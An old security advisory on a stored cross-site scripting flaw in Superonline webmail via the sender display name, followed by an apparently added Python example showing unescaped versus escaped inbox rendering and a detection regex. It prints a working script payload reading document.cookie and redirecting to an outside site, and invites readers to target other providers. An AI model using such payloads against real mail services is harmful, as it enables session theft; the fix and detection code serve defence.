--Security Report--
Advisory: XSS attack on Superonline.com email service.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 01/01/06 04:18 AM
---
Contacts:{ ICQ: 10072 MSN/Email: nukedx_at_nukedx.com Web: http://www.nukedx.com }
---
About: With this method, Superonline Mail is exposed to an XSS attack, a.k.a. "Cross Site Scripting". The attacker, with the help of the mail user clicking on the received mail, is able to inject code through the mail. The only thing necessary is to click on the mail; there is no need to open and read it. As is well known, some e-mail providers use scripts in their web interfaces, and bugs in the "print or output scripts" give us the chance to see what we can do with them.
---
How: The sender name is written as From: Name <sender_at_attacker.com> and sent to the server, and the victim receives it as From: [XSS-text] <sender_at_attacker.com> and kaboom! The mail user (namely our victim) gets the XSS code injected. If we set our name to 28 chars and then add our XSS code, the victim reads this mail's sender as our name, with no visible sign of the injected code, and gets infected. I used my name as "Mustafa Can<script></script>" (not with quotation marks), converted it to 28 chars and injected it with the XSS code. The mail user may also be infected by a 28-char XSS code while only viewing the inbox. The XSS code I personally used was: Can<script></script><script>alert(document.cookie);</script><script>alert('You have just been infected with XSS code');</script><script>location.href('http://www.nukedx.com/pwned.htm');</script>
---
Bonus: This bug is currently present on some OTHER mail providers too. (Don't get excited, not on the so-called famous and safe ones such as Hotmail, Gmail, ICQmail, MyNet) but on some other ones such as Superonline and the ones which are waiting for you to harass them. For further information, please contact me via the contact details left above; I am indisputably unable to provide more information by mail.
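The rendering path the "How" section describes, and the fix a webmail maintainer would apply to it, as an added Python example. This is not Superonline's code and not the author's; the sample message, the 28-character inbox column width, the CSS class names and all function names are assumptions for illustration. The inbox list interpolates the From display name into HTML unescaped, so the `<script></script>` part of a 28-character name renders as nothing visible while still executing; HTML-escaping the name before interpolation turns the tags into literal text. A small check for tag openers in a display name is included as a gateway-side detection.

```python
"""Added example (not code from the advisory): how the From display name
reaches the inbox HTML, and how HTML-escaping it neutralises the injection.
The sample message, the column width and all names are assumptions."""
import email
import email.policy
import html
import re

# Constructed sample message: the sender name carries the 28-character
# payload quoted in the advisory, followed by extra script tags.
RAW_MESSAGE = (
    b"From: Mustafa Can<script></script><script>alert(document.cookie);</script>"
    b" <sender@attacker.example>\r\n"
    b"To: victim@example.com\r\n"
    b"Subject: hello\r\n"
    b"\r\n"
    b"body\r\n"
)

INBOX_NAME_WIDTH = 28  # assumed: the advisory reports a 28-char limit in the inbox list


def split_from(header: str):
    """Split 'Display Name <addr>' at the LAST '<' so that angle brackets
    inside the display name stay with the name and are not mistaken for
    the address part."""
    name, sep, addr = header.rpartition("<")
    if not sep:
        return "", header.strip()
    return name.strip(), addr.rstrip(">").strip()


def sender_name_from_message(raw: bytes) -> str:
    """Pull the raw From header out of an RFC 822 message; the compat32
    policy returns the header text without any address parsing."""
    msg = email.message_from_bytes(raw, policy=email.policy.compat32)
    return split_from(msg.get("From", ""))[0]


def render_inbox_row_unsafe(name: str) -> str:
    """The vulnerable pattern: the (column-width-truncated) name is dropped
    into the HTML as-is. <script></script> renders as nothing visible, so the
    row looks like a normal sender while the tags are live markup."""
    return f"<td class=sender>{name[:INBOX_NAME_WIDTH]}</td>"


def render_inbox_row_safe(name: str) -> str:
    """Fix: escape before interpolation; '<' and '>' become entities."""
    return f"<td class=sender>{html.escape(name[:INBOX_NAME_WIDTH])}</td>"


def render_message_view_safe(name: str, addr: str) -> str:
    """The opened-message view shows the whole name, so the full payload
    would fire there without escaping; escape every header-derived value."""
    return f"<div class=from>From: {html.escape(name)} &lt;{html.escape(addr)}&gt;</div>"


# Heuristic: a display name never legitimately contains an HTML tag opener
# such as '<script', '</script' or '<!--'. Used as a gateway/mail-filter check.
_TAG_OPENER = re.compile(r"</?[a-z!]", re.IGNORECASE)


def display_name_looks_like_markup(name: str) -> bool:
    return bool(_TAG_OPENER.search(name))


if __name__ == "__main__":
    name, addr = split_from(
        email.message_from_bytes(RAW_MESSAGE, policy=email.policy.compat32)["From"]
    )
    print("unsafe inbox row:", render_inbox_row_unsafe(name))
    print("safe inbox row:  ", render_inbox_row_safe(name))
    print("safe mail view:  ", render_message_view_safe(name, addr))
    print("flagged by gateway check:", display_name_looks_like_markup(name))
```

Running the block shows the unsafe row containing live `<script></script>` tags that a browser renders invisibly, next to the escaped row where the same characters appear as `&lt;script&gt;`; the same escaping has to be applied wherever a header value is printed, including the full message view, not only in the truncated inbox column.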
Pictures of XSS:
Inbox: http://www.nukedx.com/gelenmail.png
In Mail: http://www.nukedx.com/superxss.png
Regards,
From the NWPX team, nuker a.k.a nukedx